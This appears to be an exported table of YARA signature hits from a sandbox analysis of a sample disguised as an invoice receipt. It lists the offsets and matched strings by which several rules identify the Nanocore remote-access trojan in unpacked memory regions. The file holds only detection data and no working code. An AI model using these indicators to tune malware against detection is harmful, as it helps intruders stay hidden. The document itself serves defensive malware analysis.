3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
16.0.chmac.exe.415058.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.0.chmac.exe.415058.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
16.0.chmac.exe.415058.9.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.0.chmac.exe.415058.9.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
16.0.chmac.exe.415058.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.0.chmac.exe.415058.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
16.0.chmac.exe.415058.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.0.chmac.exe.415058.7.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
16.0.chmac.exe.400000.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.0.chmac.exe.400000.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
16.0.chmac.exe.400000.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.0.chmac.exe.400000.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
14.2.chmac.exe.4830000.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.2.chmac.exe.4830000.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
14.2.chmac.exe.4830000.9.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.chmac.exe.4830000.9.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
16.0.chmac.exe.400000.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.0.chmac.exe.400000.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
16.0.chmac.exe.400000.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.0.chmac.exe.400000.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
16.1.chmac.exe.415058.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.1.chmac.exe.415058.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
16.1.chmac.exe.415058.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.1.chmac.exe.415058.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
14.2.chmac.exe.37b0e54.8.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
14.2.chmac.exe.37b0e54.8.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
14.2.chmac.exe.37b0e54.8.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.2.chmac.exe.658288.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.2.chmac.exe.658288.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
16.2.chmac.exe.658288.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.2.chmac.exe.658288.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.1.G2M8C76V_INV0ICE_RECEIPT.exe.415058.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
16.2.chmac.exe.24b0000.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.2.chmac.exe.24b0000.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
16.2.chmac.exe.24b0000.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.2.chmac.exe.24b0000.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
14.0.chmac.exe.415058.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.0.chmac.exe.415058.7.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
14.0.chmac.exe.415058.7.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.0.chmac.exe.415058.7.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
16.0.chmac.exe.400000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.0.chmac.exe.400000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
16.0.chmac.exe.400000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.0.chmac.exe.400000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
14.2.chmac.exe.50a9b8.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.2.chmac.exe.50a9b8.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
14.2.chmac.exe.50a9b8.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.chmac.exe.50a9b8.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
16.0.chmac.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x85e5:$x1: NanoCore.ClientPluginHost 0x8622:$x2: IClientNetworkHost 0xc155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.0.chmac.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x835d:$x1: NanoCore Client.exe 0x85e5:$x2: NanoCore.ClientPluginHost 0x9c1e:$s1: PluginCommand 0x9c12:$s2: FileCommand 0xaac3:$s3: PipeExists 0x1087a:$s4: PipeCreated 0x860f:$s5: IClientLoggingHost
16.0.chmac.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.0.chmac.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x834d:$a: NanoCore 0x835d:$a: NanoCore 0x8591:$a: NanoCore 0x85a5:$a: NanoCore 0x85e5:$a: NanoCore 0x83ac:$b: ClientPlugin 0x85ae:$b: ClientPlugin 0x85ee:$b: ClientPlugin 0x84d3:$c: ProjectData 0x8eda:$d: DESCrypto 0x108a6:$e: KeepAlive 0xe894:$g: LogClientMessage 0xaa8f:$i: get_Connected 0x9210:$j: #=q 0x9240:$j: #=q 0x925c:$j: #=q 0x928c:$j: #=q 0x92a8:$j: #=q 0x92c4:$j: #=q 0x92f4:$j: #=q 0x9310:$j: #=q
16.2.chmac.exe.658288.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.2.chmac.exe.658288.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
16.2.chmac.exe.658288.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.2.chmac.exe.658288.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
14.1.chmac.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.1.chmac.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
14.1.chmac.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.1.chmac.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
13.2.chmac.exe.3011458.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
